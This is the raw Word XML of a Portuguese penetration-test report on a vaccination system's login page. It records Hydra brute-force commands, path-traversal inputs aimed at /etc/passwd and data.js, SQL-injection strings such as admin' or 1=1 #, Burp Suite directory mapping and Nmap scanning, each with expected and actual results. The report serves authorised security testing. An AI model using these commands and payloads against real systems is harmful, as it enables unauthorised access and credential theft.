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7" w:rsidRPr="00A63EAA" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7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8C6DC7" w:rsidRPr="008B447D" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7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, de forma detalhada,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8C6DC7" w:rsidRPr="00A63EAA" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7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>Iteração 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00191402" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7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Pr="00191402">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tela Login - Exploração via Força Brut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</w:t>
      </w:r>
      <w:r w:rsidR="002A0DD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> total das sessões executadas:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1hora e 2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tilizar a ferramenta Hydra para</w:t>
      </w:r>
      <w:r w:rsidR="003E1ACB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontrar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, por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e erro, um login de um usuário e senha válidos para efetuar login no Sistema de Vacina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2A0DD8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2A0DD8" w:rsidRDefault="00C12C3D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ar a Hydra com os</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> parâmetros</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> login e senha</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> para que ela realize os testes de acesso com força bruta na tela de Login.</w:t>
      </w:r>
      <w:r w:rsidR="00EC2366">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A0DD8" w:rsidRDefault="002A0DD8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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002A0DD8" w:rsidRDefault="002A0DD8" w:rsidP="002A0DD8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2A0DD8" w:rsidRPr="002A0DD8" w:rsidRDefault="002A0DD8" w:rsidP="002A0DD8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8C6DC7" w:rsidRDefault="00EC2366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-se que o sistema possua </w:t>
      </w:r>
      <w:r w:rsidR="002A0DD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>proteção</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> AntiSpam, como Captcha que impeça a ferramenta automatizada de prosseguir até o fim do teste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C12C3D" w:rsidRDefault="008C6DC7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  <w:r w:rsidR="00C12C3D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> A ferramenta está esperando 3 parâmetros quando, a tela de Login só utiliza 2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Pr="00736DBC" w:rsidRDefault="002A0DD8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>Inserir um login de usuário válido e possíveis senhas mais comuns utilizadas para acesso</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> de um sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>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Espera-se que o sistema interrompa as Sessão de testes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00CD0164" w:rsidRDefault="008C6DC7" w:rsidP="00C97F3F">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9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hydra -l admin -P forcaBruta IP_do_servidor http-post-form “vacina/login.php:login=^USER^:senha=^PASS^:logado=false”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6E7A00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“-l” significa o login utilizado no momento. Nesse caso, deve ser sempre “admin”, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E7A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pois foi o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aponta para o arquivo contendo as senhas que a Hydra tentará utilizar para fazer o login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alvo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“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.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564674">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00564674">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Não Passou nos testes. As </w:t>
      </w:r>
      <w:r w:rsidR="0048383A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidR="00564674">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>s foram todas executadas sem nenhum tipo de interrupção por parte do sistema alvo.</w:t>
      </w:r>
      <w:r w:rsidR="00564674"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456110" w:rsidRDefault="008C6DC7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ferramenta Hydra para executar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s utilizando o login “admin”, cadastrado na base de dados do sistema. Além disso, usar um dicionário de senhas retiradas da </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lista de Piores Senhas de 2015</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> da SplashData [1]. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C97F3F" w:rsidRDefault="00C97F3F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64674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possua teste</w:t>
      </w:r>
      <w:r w:rsidR="00C97F3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tiSpam, como Captcha que impeça a ferramenta automatizada de prosseguir até o fim do teste.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00564674" w:rsidRPr="00564674" w:rsidRDefault="00564674" w:rsidP="0056467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hydra -l admin -P forcaBruta IP_do_servidor http-post-form “vacina/login.php:login=^USER^:senha=^PASS^:logado=false” -V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Pr="006E7A00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login utilizado no momento. Deve ser sempre admin, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E7A00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pois é foi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“-P” aponta para o arquivo contendo as senhas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> que a Hydra tentará utilizar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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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V” é para exibir no console o resultado da oper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="00456110">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Não Passou no teste. As várias</w:t>
      </w:r>
      <w:r w:rsidR="00C97F3F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> tentativas de login foram</w:t>
      </w:r>
      <w:r w:rsidR="00456110">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> executadas com sucesso conforme mostram as imagens abaixo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00456110" w:rsidRPr="00456110" w:rsidRDefault="00456110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654DEF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8201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Figura 1 - Resultado da operação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F018F3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Pr="00F018F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tela Login - Exploração via Path Transversal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uração: 2 horas e 30 minut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BC5B4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 xml:space="preserve">Um scanner foi </w:t>
      </w:r>
      <w:r w:rsidR="00846A20">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC5B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">através da ferramenta Burp Suite para identificar a estrutura de diretórios do sistema dentro do servidor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lastRenderedPageBreak/>
        <w:t>Os resultados obtidos, conforme mostra a figura 2, foram utilizados para executar os testes deste tópic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  <w:r w:rsidR="00654DEF"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550964" cy="41338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14" cy="41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2 - Resultado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46A20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ada a estrutura hierárquica do sistema descrita na figura acima, o objetivo do teste é utilizar entradas maliciosas na URL para </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="0094663B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">conseguir acesso a locais não autorizados a um usuário </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">fora </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="0094663B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>do sistema.</w:t>
      </w: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login, o seguinte parâmetro é exibido na url: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>vacina/login.php?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>logado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=false.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00271556" w:rsidRDefault="00B959F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A primeir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é</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> fazer uma requisição ao servidor alterando a url citada anteriormente para: v</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">acina/login.php?logado=../../dir, </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="0094663B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  <w:r w:rsidR="00DF0646">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs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Espera-se que o sistema bloqueie o acesso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dir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> no cmd do Windows serve para listar os arquivos e diretórios dentro da pasta atua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  <w:r w:rsidR="00B959F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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 ../../cat /etc/passwd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6C31FD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DF0646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DF0646" w:rsidRDefault="00DF0646" w:rsidP="006C31F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cat /etc/passwd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, no sistema operacional Linux, serve para listar o conteúdo de passwd (local onde ficam armazenados informações de senha dos usuários). </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Como o sistema operacional do servidor em questão é Windows, então caso seja executado, o esperado seria um erro.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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3164B7" w:rsidRPr="00544368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544368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ado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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>O comando  “../../” servem para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional d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A966EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>O sistema p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>assou no teste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./data.js </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">para acessar o arquivo “data.js”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="006C31FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>comando “../” serve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> para tentar navegar de forma forçada dentro da estrutura de pastas do sistema </w:t>
      </w:r>
      <w:r w:rsidRPr="001E119E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>operacional do servidor.</w:t>
      </w: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“</w:t>
      </w:r>
      <w:r w:rsidR="006C31FD" w:rsidRPr="001E119E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Data.js</w:t>
      </w:r>
      <w:r w:rsidRPr="001E119E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>” foi um arquivo descoberto através do escaneamento realizado através do Burp Suite Intercept para mapear a estrutura de pasta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/././ </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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  <w:r w:rsidR="003164B7"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in=teste&amp;senha=./././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spera-se </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>que o sistema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> impeça o acesso</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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Pr="00FC374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  <w:r w:rsidR="003164B7"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in=teste&amp;senha</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">=.. 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spera-se que o sistema bloqueie o acesso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  <w:r w:rsidR="003164B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>. 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D3B2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Mapeamento da hierarquia de pasta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Utilizar de forma automatizada o módulo Burp Spider da ferramenta Burp Suite para </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>realizar um reconhecimento da a hierarquia de diretórios do sistema armazenados dentro do servidor a partir da URL da tela de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Login: IP_do_servidor/vacina/login.php. A partir dos resultados, verificar se foi possível ter acesso à hierarquia de pastas do sistema mesmo sem efetuar a requisição do login. Além disso, verificar se é possível ter acesso aos código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essar a página do Login utilizando a url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0E26E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> I</w:t>
      </w:r>
      <w:r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_do_servidor/vacina/login.php. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C36925" w:rsidRDefault="00C3692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C36925" w:rsidRPr="00C36925" w:rsidRDefault="00C36925" w:rsidP="00C3692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C3692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não permita</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> a visualização da hierarquia de pastas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Conforme mostra figura 3, não foi possível mapear a estrutura de pastas do sistema apenas acessando a página de Login.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00654D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54DEF" w:rsidRDefault="00654DEF" w:rsidP="00654D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4681855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2719E7" w:rsidRDefault="008C6DC7" w:rsidP="00654DEF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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 3 - Resultado </w:t>
      </w:r>
      <w:r w:rsidR="0048383A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> de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72A0D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Exploração </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>v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4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de Login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Login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36925" w:rsidRPr="00C36925" w:rsidRDefault="00C36925" w:rsidP="00C3692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lastRenderedPageBreak/>
        <w:t>Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="00C36925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85A8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 xml:space="preserve">Entrada: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>admin’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[8,9 e 10] como entrada no campo Login, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao login de usuários cadastrados. Comentários inline foram utilizados para tentar forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inseri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7067BC" w:rsidRDefault="007067BC" w:rsidP="007067BC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7067BC" w:rsidRPr="007067BC" w:rsidRDefault="007067BC" w:rsidP="007067BC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realize o devido tratamento para impedir que os comentários sejam interpretados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007067BC" w:rsidRDefault="007067BC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 w:rsidRPr="003E1ACB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Entradas: </w:t>
      </w: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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E1ACB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">admin’ or 1=1 #   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007067BC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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E1ACB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">admin’ or 1=1  -- </w:t>
      </w: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  <w:lang w:val="en-US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Passou no teste. A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrad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fazendo uso de uma única aspa simples para completar a entrada de uma possível instrução SQL executada no momento do login no sistem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’ or ‘a’=’a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="004E230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4E2307" w:rsidRDefault="004E230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Default="004E230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e todos os  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</w:t>
      </w:r>
      <w:r w:rsidRP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aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados.</w:t>
      </w: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A63EAA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t>Iteração 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00A63EAA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A63EAA" w:rsidRDefault="00A83EB9" w:rsidP="008C6DC7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2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00A966EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Atividade: a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nálise do Servidor </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00A63EAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>via Nmap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Pr="001702C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Nmap para descobrir quais portas estavam abertas no servidor e que </w:t>
      </w:r>
      <w:r w:rsidRPr="001702C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>atividade</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00892814">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>maliciosa</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r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</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="001702C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ser desenvolvida</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidRPr="001702C9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>a partir di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4E2307" w:rsidRP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4777A" w:rsidRPr="00E01CAE" w:rsidRDefault="0084777A" w:rsidP="0084777A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Pr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas, e as versões dos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">softwares que estão rodando </w:t>
      </w:r>
      <w:r w:rsidRPr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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4E2307" w:rsidRDefault="004E230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4777A" w:rsidRPr="00E01CAE" w:rsidRDefault="0084777A" w:rsidP="0084777A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Pr="007D037A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas, e as versões dos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
